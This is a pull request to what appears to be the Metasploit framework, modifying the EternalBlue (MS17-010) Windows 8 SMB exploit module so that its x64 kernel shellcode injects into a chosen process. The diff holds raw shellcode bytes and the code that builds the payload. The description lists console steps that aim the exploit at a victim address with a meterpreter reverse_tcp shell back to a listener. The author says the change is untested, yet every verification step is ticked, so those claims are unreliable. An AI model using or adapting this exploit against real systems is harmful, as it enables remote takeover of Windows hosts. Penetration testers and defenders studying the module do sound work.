### PR TITLE
Add support for ms17_010_eternalblue_win8 ProcessName option

### DIFF
--- a/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py
+++ b/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py
@@ -86,6 +86,7 @@ metadata = {
     'options': {
         'RHOST': {'type': 'address', 'description': 'Target server', 'required': True, 'default': None},
         'RPORT': {'type': 'port', 'description': 'Target server port', 'required': True, 'default': 445},
+        'ProcessName': {'type': 'string', 'description': 'Process to inject payload into.', 'required': False, 'default': 'spoolsv.exe'},        
         'GroomAllocations': {'type': 'int', 'description': 'Initial number of times to groom the kernel pool.', 'required': True, 'default': 13},
         # if anonymous can access any share folder, 'IPC$' is always accessible.
         # authenticated user is always able to access 'IPC$'.
@@ -98,10 +99,25 @@ metadata = {
     }
 }
 
+
+
+def hash(process):  
+    # calc_hash from eternalblue_kshellcode_x64.asm    
+    proc_hash = 0
+    for c in str( process + "\x00" ):
+        proc_hash  = ror( proc_hash, 13 )
+        proc_hash += ord( c )
+    return pack('<I', proc_hash)
+
+def ror( dword, bits ):
+    return ( dword >> bits | dword << ( 32 - bits ) ) & 0xFFFFFFFF
+
 # git clone https://github.com/worawit/MS17-010
 # cd MS17-010/shellcode
 # nasm -f bin eternalblue_kshellcode_x64.asm -o eternalblue_kshellcode_x64.bin
-eternalblue_kshellcode_x64 = (
+def eternalblue_kshellcode_x64(process="spoolsv.exe"):
+    proc_hash = hash(process)
+    return (
     '\x55\xe8\x2e\x00\x00\x00\xb9\x82\x00\x00\xc0\x0f\x32\x4c\x8d'
     '\x0d\x34\x00\x00\x00\x44\x39\xc8\x74\x19\x39\x45\x00\x74\x0a'
     '\x89\x55\x04\x89\x45\x00\xc6\x45\xf8\x00\x49\x91\x50\x5a\x48'
@@ -123,8 +139,8 @@ eternalblue_kshellcode_x64 = (
     '\x11\x4d\x89\xc1\x4d\x8b\x09\x4d\x39\xc8\x0f\x84\xc6\x00\x00'
     '\x00\x4c\x89\xc8\x4c\x29\xf0\x48\x3d\x00\x07\x00\x00\x77\xe6'
     '\x4d\x29\xce\xbf\xe1\x14\x01\x17\xe8\xbb\x00\x00\x00\x8b\x78'
-    '\x03\x83\xc7\x08\x48\x8d\x34\x19\xe8\xf4\x00\x00\x00\x3d\x5a'
-    '\x6a\xfa\xc1\x74\x10\x3d\xd8\x83\xe0\x3e\x74\x09\x48\x8b\x0c'
+    '\x03\x83\xc7\x08\x48\x8d\x34\x19\xe8\xf4\x00\x00\x00\x3d' + proc_hash +
+    '\x74\x10\x3d' + proc_hash + '\x74\x09\x48\x8b\x0c' 
     '\x39\x48\x29\xf9\xeb\xe0\xbf\x48\xb8\x18\xb8\xe8\x84\x00\x00'
     '\x00\x48\x89\x45\xf0\x48\x8d\x34\x11\x48\x89\xf3\x48\x8b\x5b'
     '\x08\x48\x39\xde\x74\xf7\x4a\x8d\x14\x33\xbf\x3e\x4c\xf8\xce'
@@ -154,7 +170,7 @@ eternalblue_kshellcode_x64 = (
     '\xc1\x41\x5f\x5e\x5f\x5b\x5d\xc3\x48\x92\x31\xc9\x51\x51\x49'
     '\x89\xc9\x4c\x8d\x05\x0d\x00\x00\x00\x89\xca\x48\x83\xec\x20'
     '\xff\xd0\x48\x83\xc4\x30\xc3'
-)
+    )
 
 # because the srvnet buffer is changed dramatically from Windows 7, I have to choose NTFEA size to 0x9000
 NTFEA_SIZE = 0x9000
@@ -663,7 +679,7 @@ def exploit(args):
     smbpass = args['SMBPass'] if 'SMBPass' in args else ''
 
     # XXX: JSON-RPC requires UTF-8, so we Base64-encode the binary payload
-    sc = eternalblue_kshellcode_x64 + b64decode(args['payload_encoded'])
+    sc = eternalblue_kshellcode_x64(args['ProcessName']) + b64decode(args['payload_encoded'])
 
     if len(sc) > 0xe80:
         module.log('Shellcode too long. The place that this exploit put a shellcode is limited to {} bytes.'.format(0xe80), 'error')


### PR DESCRIPTION
The shellcode was hardcoded to process "lsass.exe" or "spoolsv.exe". This change adds support for ProcessName option by using runtime hash (similar to #10792 ).
**Please verify this module cause I don't have test machine for it.**
## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use exploit/windows/smb/ms17_010_eternalblue_win8`
- [x] `set processname explorer.exe`
- [x] `set rhost <victim-address>`
- [x] `set payload windows/x64/meterpreter/reverse_tcp`
- [x] `set lhost <listener-address>`
- [x] `run`
- [x] `ps` to find the PID of explorer.exe
- [x] `getpid` to check the PID


